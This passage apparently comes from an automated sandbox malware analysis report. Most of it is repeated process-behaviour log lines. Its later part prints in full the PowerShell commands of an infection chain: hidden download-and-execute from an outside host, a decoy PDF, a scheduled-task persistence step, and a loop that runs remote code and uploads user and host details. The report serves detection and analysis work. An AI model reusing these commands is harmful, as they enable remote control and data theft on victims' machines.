              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4040Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5840Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5791Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3944Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3019
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6782
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5516Thread sleep time: -18446744073709540s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7112Thread sleep time: -16602069666338586s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7388Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\svchost.exe TID: 7392Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5596Thread sleep time: -19369081277395017s >= -30000s
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: powershell.exe, 00000000.00000002.1901146654.000001B6FA7C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
              Source: svchost.exe, 00000007.00000002.3506898645.000001D5D0A55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: svchost.exe, 00000007.00000002.3505876506.000001D5CB42B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp{
              Source: powershell.exe, 00000005.00000002.2765832433.0000025368614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: powershell.exe, 00000012.00000002.4194744188.000001ABEDEA1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll,,
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Bypasses PowerShell execution policy
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\appdata\local\temp\sklyar.pdf"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\system32\schtasks.exe" /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /fJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.Length -gt 1){$jkr=[system.text.encoding]::utf8.getString($flm);if($jkr -match 'get-content'){[byte[]] $drpy=IEX $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[System.Net.Dns]::GetHostAddresses($ip)+[System.Environment]::NewLine;$hbn=IEX $jkr;$bjdo+=$hbn|Out-string;[byte[]]$drpy=[system.text.encoding]::Utf8.GetBytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [system.convert]::frombase64string($d);[system.io.file]::writeallbytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='zgltihisigmkc2v0ihigpsbjcmvhdgvvymply3qoildty3jpchquu2hlbgwikqpjid0ginbvd2vyc2hlbgwuzxhlic1legvjdxrpb25wb2xpy3kgynlwyxnzic13ighpzgrlbiatbm9wcm9mawxlic1jihn0yxj0lxnszwvwidm5o3n0yxj0lxnszwvwichnzxqtcmfuzg9tic1taw4gnsatbwf4idqzkttzdgfydc1zbgvlccaxmtskawlrpw5ldy1vymply3qgbmv0lndlymnsawvuddskcmmgpsatam9pbiaokdq4li41nykgfcbnzxqtcmfuzg9tic1jb3vudcggz2v0lxjhbmrvbsatbwluiduglw1hecaxnskgfcbmb3jlywnolw9iamvjdcb7iftjagfyxsrffskgkyanlnr4dcc7jgzsbt0kawlrlmrvd25sb2fkzgf0ysgnahr0chm6ly9vbmvkcml2zxzpzxcuc2hvcc9hcgkvdmfsdwvzlzgyotgwndy0mjqzodiymte1nzawl3jlznjlc2g4ms8nkyryyyk7awyojgzsbs5mzw5ndggglwd0idepeyrqa3i9w3n5c3rlbs50zxh0lmvuy29kaw5nxto6dxrmoc5nzxrtdhjpbmcojgzsbsk7awyojgprciatbwf0y2ggj2dldc1jb250zw50jyl7w2j5dgvbxv0gjgrychk9suvyicrqa3i7fwvsc2v7jgjqzg89d2hvyw1poyriamrvkz0npt0noyriamrvkz1bu3lzdgvtlk5ldc5ebnndojphzxrib3n0qwrkcmvzc2vzkcrpcckrw1n5c3rlbs5fbnzpcm9ubwvudf06ok5ld0xpbmu7jghibj1jrvggjgprcjskympkbys9jghibnxpdxqtc3ryaw5no1tiexrlw11djgrychk9w3n5c3rlbs50zxh0lmvuy29kaw5nxto6vxrmoc5hzxrcexrlcygkympkbyk7fttzdgfydc1zbgvlccaxmdskdwprpw5ldy1vymply3qgbmv0lndlymnsawvuddtzdgfydc1zbgvlccaxnjskdwprlnvwbg9hzgrhdgeoj2h0dhbzoi8vb25lzhjpdmv2awv3lnnob3avyxbpl3zhbhvlcy9yzwzyzxnoodenlcrkcnb5ktt9igpyllj1bibjlcawlcbmywxzzq==';$b=[system.convert]::frombase64string($a);$c=[system.text.encoding]::utf8.getstring($b);set-content c:\users\public\libraries\libraries.vbs -value $c;schtasks.exe /create /tn explorercoreupdatetaskmachine /sc minute /mo 3 /tr c:\users\public\libraries\libraries.vbs /f;
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 16;$ujk.uploaddata('https://onedriveview.shop/api/values/refresh81',$drpy);}Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -executionpolicy bypass -w hidden -noprofile -c start-sleep 39;start-sleep (get-random -min 5 -max 43);start-sleep 11;$iik=new-object net.webclient;$rc = -join ((48..57) | get-random -count( get-random -min 5 -max 15) | foreach-object { [char]$_}) + '.txt';$flm=$iik.downloaddata('https://onedriveview.shop/api/values/82980464243822115700/refresh81/'+$rc);if($flm.length -gt 1){$jkr=[system.text.encoding]::utf8.getstring($flm);if($jkr -match 'get-content'){[byte[]] $drpy=iex $jkr;}else{$bjdo=whoami;$bjdo+='==';$bjdo+=[system.net.dns]::gethostaddresses($ip)+[system.environment]::newline;$hbn=iex $jkr;$bjdo+=$hbn|out-string;[byte[]]$drpy=[system.text.encoding]::utf8.getbytes($bjdo);};start-sleep 10;$ujk=new-object net.webclient;start-sleep 